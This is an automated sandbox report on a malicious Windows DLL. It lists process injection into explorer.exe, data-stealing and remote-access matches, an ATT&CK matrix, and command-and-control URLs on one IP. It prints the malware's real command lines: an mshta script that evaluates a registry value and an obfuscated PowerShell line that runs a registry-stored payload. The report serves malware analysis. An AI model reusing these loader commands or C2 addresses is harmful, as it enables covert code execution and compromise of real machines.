                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580BE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_0580BE55

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 146.70.35.138 80
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF61B5912E0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF61B5912E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 352000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 352000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                      Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000021.00000000.408252291.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.408234525.0000000005610000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000021.00000000.400441587.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                      Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
                      Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F12D3 cpuid | 2_2_049F12D3
                      Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05804DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, | 2_2_05804DF5
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, | 2_2_049F5410
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, | 2_2_049F515F
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, | 2_2_049F12D3

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      1
                      Valid Accounts
                      1
                      Windows Management Instrumentation
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      1
                      Obfuscated Files or Information
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API
                      Boot or Logon Initialization Scripts1
                      Access Token Manipulation
                      1
                      File Deletion
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol1
                      Email Collection
                      Exfiltration Over Bluetooth2
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter
                      Logon Script (Windows)413
                      Process Injection
                      1
                      Masquerading
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts
                      NTDS25
                      System Information Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation
                      LSA Secrets1
                      Query Registry
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials11
                      Security Software Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items413
                      Process Injection
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc Filesystem3
                      Process Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery
                      Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 614287, Sample: VoevdOQpeU.dll, Start date: 23/04/2022, Architecture: WINDOWS, Score: 100
                      Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
                      Process tree recovered from the graph (per-process counts from the graph labels kept after the name):
                      • mshta.exe 19 (started)
                        • powershell.exe 33 (started): Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
                          • explorer.exe (injected): Self deletion via cmd delete
                            • cmd.exe (started): Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                              • PING.EXE (started): 192.168.2.1 unknown unknown
                              • conhost.exe (started)
                          • csc.exe 3 (started): dropped C:\Users\user\AppData\Local\...\poet0yxq.dll, PE32
                            • cvtres.exe 1 (started)
                          • csc.exe 3 (started): dropped C:\Users\user\AppData\Local\...\bscdh0f0.dll, PE32
                            • cvtres.exe 1 (started)
                          • conhost.exe (started)
                      • loaddll32.exe 1 (started)
                        • cmd.exe 1 (started)
                          • rundll32.exe 1 6 (started): 146.70.35.138, 49766, 80 TENET-1ZA United Kingdom; System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Writes registry values via WMI
                            • control.exe 1 (started)
                              • rundll32.exe (started)
                        • WerFault.exe 6 9 (started)
                        • WerFault.exe 2 9 (started)
                        • WerFault.exe (started)

                      Source | Detection | Scanner | Label | Link
                      VoevdOQpeU.dll | 38% | ReversingLabs | Win32.Trojan.Lazy
                      VoevdOQpeU.dll | 100% | Joe Sandbox ML
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      2.2.rundll32.exe.49f0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src | 0% | Avira URL Cloud | safe
                      http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
                      http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src | 0% | Avira URL Cloud | safe
                      http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
                      http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src | 0% | Avira URL Cloud | safe
                      http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
                      No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src | true | Avira URL Cloud: safe | unknown
                      http://146.70.35.138/phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src | true | Avira URL Cloud: safe | unknown
                      http://146.70.35.138/phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src | true | Avira URL Cloud: safe | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                      http://constitution.org/usdeclar.txt | rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      http://constitution.org/usdeclar.txtC: | rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true
                      Private IPs:
                      192.168.2.1
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:614287
                      Start date and time: 23/04/202208:10:432022-04-23 08:10:43 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 16s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:VoevdOQpeU.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:43
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDLL@29/23@0/2
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HDC Information:
                      • Successful, ratio: 21% (good quality ratio 19.9%)
                      • Quality average: 80.7%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 104
                      • Number of non-executed functions: 215
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
08:11:55 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
08:12:10 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
08:12:34 | API Interceptor | 41x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Context
146.70.35.138 | nhLAwAo49f.dll | malicious |
